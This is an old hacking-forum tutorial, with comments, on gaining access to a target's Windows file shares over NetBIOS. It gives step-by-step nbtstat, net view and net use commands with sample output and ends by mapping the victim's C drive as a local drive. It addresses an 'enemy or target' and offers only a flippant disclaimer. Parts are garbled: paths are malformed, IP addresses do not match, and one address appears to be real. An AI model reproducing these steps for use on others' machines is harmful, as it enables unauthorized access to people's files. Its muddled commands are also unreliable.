Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

NetBIOS Hacking


NetBIOS Hacking

By ghostghost | 8938 Reads |
0     0


NetBIOS Hacking


**** | By g077ch4 | ****

============================ Sunday, August 20 , 2006

Disclaimer: I have written this here article for education purposes only. Using NetNIOS is probably the easiest ways of hacking or rooting someone remotly. So if you go and get success on someone with NetBIOS, then FBI catches you. Then this is your fault because this article written for you to know in theory so whatever you do after reading this article was your choice no matter what. So it is not my fault neither is it HBH’s fault.

Chapters:

What Is NetBIOS

nbtstat

What do I need for this?

Types Of attacks

Hack Part One

==================================

What is NetBIOS?

NetBIOS was made by IBM and Sytek used for an application programming interface(API) for client software for public access NetBios stands for: Network-Basic-Input-Output System.NetBios is an API used by application programs on a PC LAN that uses MS-DOS or some version of UNIX, providing application developers with a uniform set of commands for requesting lower-level network services. NetBIOS is also is a communication protocol used by Windows for communication on a LAN. When you browse the network neighborhood for other computers, netbios is involved. Like any other service or API NetBIOS has been assigned to a port number. This is port number 139.NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include:

  1. Name of the computer

  2. Username

  3. Domain

  4. Computer Name

  5. and many others.

==================================

Nbtstat

Nbtstat is a command performed in command promt or MS-DOS. You can reach any of these by going to start>run>cmd. Or start>run>command. And last but not least that I know of start>run>command.com. But I just use cmd. If you want more information on “nbtstat” then go to MD-DOS or cmd and type nbtstat and it drops a bunch of information that is very useful to your knowledge of Nbtstat and NetBIOS. When you open cmd it should look like this:

C:\windows>

or for some people it might be

Microsoft Windows XP [Version ***] <C> Copyright 1985-2001 Microsoft Crop.

C:\documents and Settings***>

Which ever is fine.

==================================

Now we check if you enemy or target is vulnerable to NetBIOS hacking. But before anything else you should first have their IP address. Now open up cmd and type:

nbtstat -a ipaddress

Replace “ipaddess” with your targets ip address. Now if you get this then it is not vulnerable:

Local Area Connection Node IpAddress: [127.0.0.1] scope Id: []

Host not found.

==================================

But if you get something like this then it is vulnerable:

NetBIOS Remote Machine Name Table

Name Type Status

user <00> UNIQUE Registered workgroup <00> GROUP Registered user <03> UNIQUE Registered user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

Note the <20>. It shows that the victim has enabled the file and printer sharing. So other wise if the <20> isnt there then its also not vulnerable.

Next we will use cmd. Type in the following: net view \127.0.0.1

If you get this then your good again:

Shared resources at \203.195.136.156 ComputerNameGoesHere

Share name Type Used as Comment


CDISK Disk

The command completed successfully. DISK“ shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like

Shared resources at \127.0.0.1

ComputerNameGoesHere

Share name Type Used as Comment c:\windows>net use k: \127.0.0.1\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k! Just double click on it and you will find that you are able to access the remote computer’s hard disk. Enjoy your first hack!

Also I would like to thank info-x.co.uk for giving me most fo my information for this article

Comments
SySTeM's avatar
SySTeM 18 years ago

Cool article :)

ghost's avatar
ghost 18 years ago

its nice, part from you did next to none of it

ghost's avatar
ghost 18 years ago

sweet, that is a very fast way to check if port 139 is open :P

ghost's avatar
ghost 18 years ago

lol copy and paste any phrase you like in to google and get 1000+ hits, this is mainly extracts from other articles copy and pasted together to make a 'new' one….its informative at least

korg's avatar
korg 18 years ago

LOL, It's mostly from http://info-x.co.uk/docview.asp?id=116

thk-geo's avatar
thk-geo 18 years ago

GAURAV KUMAR Did lots of this…

thk-geo's avatar
thk-geo 18 years ago

I mean a big part of this (Hate grammar)

ghost's avatar
ghost 18 years ago

thats what i said at the end of the article so…..STFU just playin:angry:

ghost's avatar
ghost 18 years ago

i swear that article was posted on hackthissite.org aswell.

ghost's avatar
ghost 18 years ago

and EG

ghost's avatar
ghost 18 years ago

And a couple of other sites aswell. :D

newbee's avatar
newbee 12 years ago

203.195.136.156 (is that you ?) :ninja: